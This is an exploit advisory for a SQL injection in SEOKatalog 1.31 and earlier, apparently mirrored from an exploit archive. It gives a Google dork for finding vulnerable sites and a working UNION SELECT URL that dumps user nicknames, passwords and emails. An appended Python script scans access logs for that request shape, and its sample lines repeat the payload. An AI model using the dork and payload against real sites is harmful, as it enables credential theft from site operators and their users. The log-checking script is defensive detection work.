SEOKatalog <= 1.31 (index.php) SQL Injection Vulnerability

2012.06.04
Credit: Smugller
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-89

#################
# SEOKatalog <= 1.31 (index.php) SQL Injection Vulnerability #
#################
# Exploit Title: SEOKatalog <= 1.31 (index.php) SQL Injection Vulnerability #
# Version: <= 1.31 #
# Vendor: http://www.seokatalogi.pl/ #
# Category: webapps #
# Date: 08.09.2011 #
# Author: Smugller #
# Contact: smugll3r[alt+64]gmail.com #
# Group: DevilTeam #
# Website: http://devilteam.pl #
# From: Poland #
# Google Dork: intext:"Powered by SEOKatalog 1.31" #
#################
# Exploit: http://site.com/index.php?action=site_cat&cat=&id_site=&id=-1+union+all+select+1,2,3,4,5,6,7,8,9,group_concat(0x3c62722f3e,nick,0x3a,pass,0x3a,email,0x3c62722f3e),11,12+from+seokat_users--

References:

http://devilteam.pl
http://www.seokatalogi.pl/
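
A log-review check for the request shape shown in the advisory, added here as an example (it is not part of the original advisory or of SEOKatalog's code): it flags index.php?action=site_cat requests whose cat, id_site or id value is not a plain integer. It assumes combined-format access logs and that these parameters are numeric in normal use; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Parameters from the advisory's request; assumed to be numeric in normal use.
NUMERIC_PARAMS = ("cat", "id_site", "id")
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
SQL_TOKENS = re.compile(r"\b(?:union|select|group_concat)\b|--|0x[0-9a-f]{4,}", re.I)

# Constructed sample lines (documentation IP ranges, invented timestamps).
SAMPLE_LOG = [
    '203.0.113.7 - - [04/Jun/2012:10:01:22 +0200] "GET /index.php?action=site_cat&cat=3&id_site=&id=17 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [04/Jun/2012:10:02:40 +0200] "GET /index.php?action=site_cat&cat=&id_site=&id=-1+union+all+select+1,2,3+from+seokat_users-- HTTP/1.1" 200 7340',
    '203.0.113.9 - - [04/Jun/2012:10:02:58 +0200] "GET /katalog/index.php?action=site_cat&id=-1%20UNION%20ALL%20SELECT%201 HTTP/1.1" 200 7011',
    '198.51.100.4 - - [04/Jun/2012:10:05:03 +0200] "GET /index.php?action=site_cat&id=12abc HTTP/1.1" 200 4000',
]

def check_line(line):
    """Return [(param, decoded_value, has_sql_tokens)] for one access-log line."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    url = urlsplit(match.group(1))
    if not url.path.endswith("/index.php"):
        return []
    # parse_qs decodes '+' and %XX, so encoded variants are compared in clear form.
    query = parse_qs(url.query, keep_blank_values=True)
    if query.get("action") != ["site_cat"]:
        return []
    findings = []
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):
            # Empty values appear in legitimate requests; anything else must be digits.
            if value and not re.fullmatch(r"[0-9]+", value):
                findings.append((name, value, bool(SQL_TOKENS.search(value))))
    return findings

def scan(lines):
    """Return [(line_number, param, decoded_value, has_sql_tokens)] over all lines."""
    return [(number, *finding)
            for number, line in enumerate(lines, start=1)
            for finding in check_line(line)]

if __name__ == "__main__":
    for number, param, value, has_sql in scan(SAMPLE_LOG):
        label = "SQL tokens" if has_sql else "non-numeric"
        print(f"line {number}: {param}={value!r} ({label})")
```
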


Copyright 2018, cxsecurity.com

 
